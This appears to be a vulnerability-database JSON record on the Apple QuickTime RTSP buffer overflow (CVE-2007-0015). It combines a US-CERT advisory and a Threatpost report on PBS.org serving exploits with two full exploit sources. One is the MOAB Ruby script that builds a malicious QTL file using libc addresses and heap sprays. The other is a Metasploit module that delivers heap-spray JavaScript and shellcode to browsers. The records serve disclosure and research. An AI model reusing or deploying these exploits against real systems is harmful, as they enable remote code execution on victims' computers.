2007\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n Apple QuickTime on systems running\r\n\r\n * Apple Mac OS X\r\n\r\n * Microsoft Windows\r\n\r\n Note that Apple iTunes and other software using the vulnerable\r\n QuickTime components are also affected.\r\n\r\n\r\nOverview\r\n\r\n Apple QuickTime contains a buffer overflow in the handling of RTSP\r\n URLs. This can allow a remote attacker to execute arbitrary code on a\r\n vulnerable system.\r\n\r\n\r\nI. Description\r\n\r\n A vulnerability exists in the way Apple QuickTime handles specially\r\n crafted Real Time Streaming Protocol (RTSP) URL strings. Public\r\n exploit code is available that demonstrates how opening a .QTL file\r\n triggers the buffer overflow. However, we have confirmed that other\r\n attack vectors for the vulnerability also exist.\r\n\r\n Possible attack vectors include\r\n\r\n * a web page that uses the QuickTime plug-in or ActiveX control\r\n\r\n * a web page that uses the rtsp:// protocol\r\n\r\n * a file that is associated with the QuickTime Player\r\n\r\n US-CERT is tracking this issue as VU#442497. This reference number\r\n corresponds to CVE-2007-0015.\r\n\r\n Note that this vulnerability affects QuickTime on Microsoft Windows\r\n and Apple Mac platforms. Although web pages can be used as attack\r\n vectors, this vulnerability is not dependent on the specific web\r\n browser that is used.\r\n\r\n\r\nII. Impact\r\n\r\n By convincing a user to open specially crafted QuickTime content, a\r\n remote, unauthenticated attacker can execute arbitrary code on a\r\n vulnerable system.\r\n\r\n\r\nIII. Solution\r\n\r\n We are currently unaware of a solution to this problem. Until a\r\n solution becomes available, the workarounds provided in US-CERT\r\n Vulnerability Note VU#442497 are strongly encouraged.\r\n\r\n <http://www.kb.cert.org/vuls/id/442497>\r\n\r\n\r\nIV. References\r\n\r\n * US-CERT Vulnerability Note VU#442497 -\r\n <http://www.kb.cert.org/vuls/id/442497>\r\n\r\n * Securing Your Web Browser -\r\n <http://www.us-cert.gov/reading_room/securing_browser/>\r\n\r\n * CVE-2007-0015 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA07-005A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to <cert@cert.org> with "TA07-005A Feedback VU#442497" in the\r\n subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2007 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n January 05, 2007: Initial release\r\n\r\n\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niQEVAwUBRZ7D9OxOF3G+ig+rAQLG+Af/e+VhtMJEDuzVbT47HRdINgIRiOceCx4u\r\nDZFbMaUvYu4hjGu9f+T6AaGWR9FQj1ZzWDYf/JHY67NCSkwJdFY4Th1vR09BXJGy\r\nlmAzlj7+l3U4UeR+rEud0ajP8qCO7vwRGP4rPUVkcqgaBXqdyfgQbNHtwIpw6w/z\r\neFYyUp/2EA1vHeTGdPNAkQTupuC95kA0QsiONCVv9xTqg7xnlcXBTwKz+T/DcWig\r\nLDLgPMupim8+ruhkzCCOVveIFQPBdXN5Aem/Fvpmhi2V5HRBc65vKaDoLzBpt4BZ\r\nWdbeud6ljPjm0JLPvy84Gn7qFcjCu3WP3Nayd7rhbClFZSWyGilM+Q==\r\n=RrHt\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2007-01-06T00:00:00", "title": "US-CERT Technical Cyber Security Alert TA07-005A -- Apple QuickTime RTSP Buffer Overflow", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-06T00:00:00", "id": "SECURITYVULNS:DOC:15611", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15611", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:06", "description": "", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "packetstorm", "title": "MOAB-01-01-2007.rb.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "PACKETSTORM:53412", "href": "https://packetstormsecurity.com/files/53412/MOAB-01-01-2007.rb.txt.html", "sourceData": "` \n#!/usr/bin/ruby \n# Copyright (c) LMH <lmh [at] info-pull.com> \n# Kevin Finisterre <kf_lists [at] digitalmunition.com> \n# \n# Notes: \n# Our command string is loaded on memory at a static address normally, \n# but this depends on execution method and the string length. The address set in this exploit will \n# be likely successful if we open the resulting QTL file directly, without having an \n# instance of Quicktime running. Although, when using another method and string, you'll need \n# to find the address. \n# For 100% reliable exploitation you can always use the /bin/sh address, \n# but that's not as a cool as having your box welcoming the new year. \n# Do whatever you prefer. That said, enjoy. \n# \n# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html \n \n# Command string: Use whatever you like. \n# Remember that changing this will also need a change of the target address for system(), \n# unless string length is the same. \nCMD_STRING = \"/usr/bin/say Happy new year shit bag\" \n \n# Mac OS X 10.4.8 (8L2127) \nEBP_ADDR = 0xdeadbabe \nSYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back \nSETUID_ADDR = 0x900334f0 \nCURL_ADDR = 0x916c24bc # /usr/bin/curl \nSHELL_ADDR = 0x918bef3a # /bin/sh \nCMDSTR_ADDR = [ \nSHELL_ADDR, # 0 addr to static /bin/sh (lame) \n0x017a053c, # 1 addr to our command string (cool) :> (change as necessary) \n0xbabeface, # 2 bogus addr for testing. \nCURL_ADDR # 3 addr to '/usr/bin/curl' \n] \n \n# Payload. default to CMDSTR_ADDR 0 (/bin/sh) \nHAPPY = (\"A\" * 299) + \n[EBP_ADDR].pack(\"V\") + \n[SYSTEM_ADDR].pack(\"V\") + \n[SETUID_ADDR].pack(\"V\") + \n[CMDSTR_ADDR[0]].pack(\"V\") # change array index for using diff. addr (see CMDSTR_ADDR) \n \n# Sleds: not necessary if using /bin/bash addr or other built-in addresses. \n# although, for using our own fu, we need to spray some data for better reliability \n# the goal is causing allocation of large heap chunks \nNEW = (\"\\x90\" * 30000) + CMD_STRING # feed the heap \nYEAR = (\"\\x90\" * 30000) + CMD_STRING # go johnny, go \nAPPLE = (\"\\x90\" * 30000) + \"EOOM\" # feed the heap more \nBOYZ = (\"\\x90\" * 30000) + \"FOOM\" # and more \n \n# QTL output template \nQTL_CONTENT = \"<?xml version=\\\"1.0\\\"?>\" + \n\"<?quicktime type=\\\"application/x-quicktime-media-link\\\"?>\" + \n\"<embed autoplay=\\\"true\\\" moviename=\\\"#{NEW}\\\" \" + \n\"qtnext=\\\"#{YEAR}\\\" type=\\\"video/quicktime#{APPLE}\\\" \" + \n\"src=\\\"rtsp://#{BOYZ}:#{HAPPY}\\\" />\\n\" \n \ntarget_file = File.open(\"pwnage.qtl\", \"w+\") { |f| \nf.print(QTL_CONTENT) \nf.close \n} \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/53412/MOAB-01-01-2007.rb.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:24:39", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Apple QuickTime 7.1.3 RTSP URI Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82966", "href": "https://packetstormsecurity.com/files/82966/Apple-QuickTime-7.1.3-RTSP-URI-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ \n:os_name => OperatingSystems::WINDOWS, \n:javascript => true, \n:rank => NormalRanking, # reliable memory corruption \n:vuln_test => nil, \n}) \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in Apple QuickTime \n7.1.3. This module was inspired by MOAB-01-01-2007. The \nBrowser target for this module was tested against IE 6 and \nFirefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the \nQuickTime plugin. \n}, \n'Author' => [ 'MC', 'egypt' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-0015' ], \n[ 'OSVDB', '31023'], \n[ 'BID', '21829' ], \n[ 'URL', 'http://projects.info-pull.com/moab/MOAB-01-01-2007.html' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 500, \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\\x5c\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ], \n[ 'Apple QuickTime Player 7.1.3', \n{ \n'Ret' => 0x6855d8a2 # xpsp2/2k3 :( | vista ;) \n} \n], \n[ 'Browser Universal', \n{ \n'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2 \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jan 1 2007', \n'DefaultTarget' => 0)) \nend \n \ndef on_request_uri(client, request) \n \nreturn if ((p = regenerate_payload(client)) == nil) \n \nif (target.name =~ /Automatic/) \nif (request['User-Agent'] =~ /QuickTime/i) \ntarget = targets[1] \nelse \ntarget = targets[2] \nend \nend \n \ncruft = rand_text_alphanumeric(4) \n# This is all basically filler on the browser target because we can't \n# expect the SEH to be in a reliable place across multiple browsers. \n# Heap spray ftw. \nsploit = rand_text_english(307) \nsploit << p.encoded + \"\\xeb\\x06\" + rand_text_english(2) \nsploit << [target.ret].pack('V') + [0xe8, -485].pack('CV') \n \nif (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /.qtl$/) \nprint_status(\"Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...\") \nprint_status(\"Trying target #{target.name}...\") \ncontent = build_qtl(sploit) \nelse \nprint_status(\"Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...\") \n \nshellcode = Rex::Text.to_unescape(p.encoded) \nurl = ((datastore['SSL']) ? \"https://\" : \"http://\") \nurl << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST']) \nurl << \":\" + datastore['SRVPORT'] \nurl << get_resource \njs = <<-ENDJS \n#{js_heap_spray} \nsprayHeap(unescape(\"#{shellcode}\"), 0x#{target.ret.to_s 16}, 0x4000); \nENDJS \ncontent = \"<html><body><script><!--\\n#{js}//--></script>\" \ncontent << <<-ENDEMBED \n<OBJECT \nCLASSID=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" \nWIDTH=\"1\" \nHEIGHT=\"1\" \nCODEBASE=\"http://www.apple.com/qtactivex/qtplugin.cab\"> \n<PARAM name=\"SRC\" VALUE = \"#{url}/#{cruft}.qtl\"> \n<PARAM name=\"QTSRC\" VALUE = \"#{url}/#{cruft}.qtl\"> \n<PARAM name=\"AUTOPLAY\" VALUE = \"true\" > \n<PARAM name=\"TYPE\" VALUE = \"video/quicktime\" > \n<PARAM name=\"TARGET\" VALUE = \"myself\" > \n<EMBED \nSRC = \"#{url}/#{cruft}.qtl\" \nQTSRC = \"#{url}/#{cruft}.qtl\" \nTARGET = \"myself\" \nWIDTH = \"1\" \nHEIGHT = \"1\" \nAUTOPLAY = \"true\" \nPLUGIN = \"quicktimeplugin\" \nTYPE = \"video/quicktime\" \nCACHE = \"false\" \nPLUGINSPAGE= \"http://www.apple.com/quicktime/download/\" > \n</EMBED> \n</OBJECT> \nENDEMBED \ncontent << \"</body></html>\" \nend \n \nsend_response(client, content, { 'Content-Type' => \"text/html\" }) \n \n# Handle the payload \nhandler(client) \nend \n \ndef build_qtl(overflow) \ncruft = rand_text_english(4) \n \ncontent = \"<?xml version=\\\"1.0\\\"?>\\n\" \ncontent << \"<?quicktime type=\\\"application/x-quicktime-media-link\\\"?>\\n\" \ncontent << \"<embed autoplay=\\\"true\\\" \\n\" \ncontent << \"moviename=\\\"#{cruft}\\\" \\n\" \ncontent << \"qtnext=\\\"#{cruft}\\\" \\n\" \ncontent << \"type=\\\"video/quicktime\\\" \\n\" \ncontent << \"src=\\\"rtsp://#{cruft}:#{overflow}\\\" />\\n\" \n \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82966/apple_quicktime_rtsp.rb.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2018-10-06T23:09:35", "description": "[](<https://threatpost.com/pbs-website-compromised-used-serve-exploits-092309/>)Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits.\n\nAccording to researchers at Purewire, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe.\n\nThe malicious JavaScript was found on the \u201cCurious George\u201d page that provides content on the popular animation series.\n\nA look at the code on the hijacked site shows malicious activity coming from a third-party .info domain.\n\nThe URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader ([CVE-2008-2992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992>), [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>), and [CVE-2007-5659](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659>)), AOL Radio AmpX ([CVE-2007-6250](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6250>)), AOL SuperBuddy ([CVE-2006-5820](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5820>)) and Apple QuickTime ([CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>)).\n\nPurewire said the exploit site is part of a malware campaign that includes tens of similar Web sites hosted off of a handful of common IP addresses.\n\nRead [the Purewire blog for more information](<http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits>) on this attack.\n\nA representative for PBS.org tells me the malicious code has been removed from the site.\n", "cvss3": {}, "published": "2009-09-23T22:41:03", "type": "threatpost", "title": "PBS Website Compromised, Used to Serve Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2006-5820", "CVE-2007-0015", "CVE-2007-5659", "CVE-2007-6250", "CVE-2008-2992", "CVE-2009-0927"], "modified": "2013-04-17T16:39:50", "id": "THREATPOST:EF67C4CADC97C245A3B46788F85E3A8A", "href": "https://threatpost.com/pbs-website-compromised-used-serve-exploits-092309/72217/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
Apple QuickTime buffer overflow
